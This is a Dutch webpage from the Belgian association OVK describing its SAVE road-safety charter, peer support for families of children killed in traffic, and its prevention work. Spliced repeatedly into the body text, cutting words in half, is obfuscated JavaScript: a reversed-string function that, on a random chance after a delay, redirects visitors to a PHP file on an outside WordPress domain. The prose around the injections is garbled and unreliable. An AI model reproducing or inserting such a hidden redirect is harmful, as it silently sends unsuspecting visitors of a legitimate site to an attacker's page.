Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Wat doen wij?

Meer informatie over onze vereniging kan u terugvinden op http://www.ovk.be

Ouders van Verongelukte Kinderen heeft 3 grote doelstellingen:

Lotgenotenwerking en onderlinge hulp:

Het bestaan van OVK is gebaseerd op de overtuiging dat de meest aangewezen hulp die men kan bieden aan een familie die bij een verkeersongeval een kind verloren heeft, deze is die verstrekt wordt door een persoon die zelf in gelijkaardige omstandigheden een kind, broer of zus verloren heeft. Het wezen van OVK is het netwerk van zelfhulp dat de leden van de vereniging verenigt.

Ondersteunen professionelen en lobbying:

OVK streeft ernaar dat elk lid van een familie van een jong verkeersslachtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffer kan rekenen op een menswaardige, efficiënte en professionele hulp, onmiddellijk na het ongeval en eveneens in de dagen en maanden daaropvolgend. Die hulp kan komen van verschillende professionelen die met de families in contact komen: politie, verplegend personeel, begrafenisondernemers, magistraten, onthaalbeambten in het parket, verzekeraars…

OVK wil alle betrokken professionelen aanmoedigen hun respectieve verantwoordelijkheden op te nemen bij de vervulling van hun taak. Om deze doelstelling te bereiken, leggen actieve leden, begeleid door het professioneel team, getuigenissen af tijdens infosessies en bieden zij verrijkende uitwisselingsmomenten met de betrokken professionelen aan. OVK werkt in dit verband ook samen met andere verenigingen zoals bijvoorbeeld Rondpunt vzw en de dienst(en) $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tofferhulp” target=”_blank”>slachtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tofferhulp.

Daarnaast richt OVK zich tevens toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot de beleidsmakers op alle niveaus, die betrokken zijn bij beslissingen en maatregelen inzake verkeersveiligheid en bij alle aspecten die met deze problematiek samenhangen. OVK werkt in dit opzicht samen met verschillende gespecialiseerde instanties, zoals de Federale Commissie voor Verkeersveiligheid, het BIVV, het kabinet van de minister of staatssecretaris voor mobiliteit, het Netwerk Duurzame Mobiliteit, de Vlaamse Stichting Verkeerskunde… OVK werkt eveneens samen met de diverse federale of regionale overheden en instanties die op regelmatige tijdstippen een staten-generaal van de verkeersveiligheid organiseren.

Sensibilisatie/preventie:

Sinds 1995 ontstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonden binnen de vereniging een aantal acties onder de SAVE-noemer. Deze zijn:

  • het SAVE-charter weggebruikers
  • de SAVE-borden
  • de anonieme SAVE-borden
  • het SAVE- Steden & Gemeenten project

Daarnaast steunt OVK verschillende theaterstukken en boeken:

  • Flits! (theaterstuk over jongeren en weekendongevallen) – Wim Geysen
  • Wolken en een beetje regen (jeugdboek over jongeren in het verkeer) – Dirk Dobbeleers ­en Marc Hendrickx
  • Zonder afscheid (boek met gesprekken met nabestaanden van jonge verkeersslachtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffers) – Wim Geysen
  • De DVD’Afscheid nemen bestaat niet’, gebaseerd op het boek Zonder Afscheid
© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be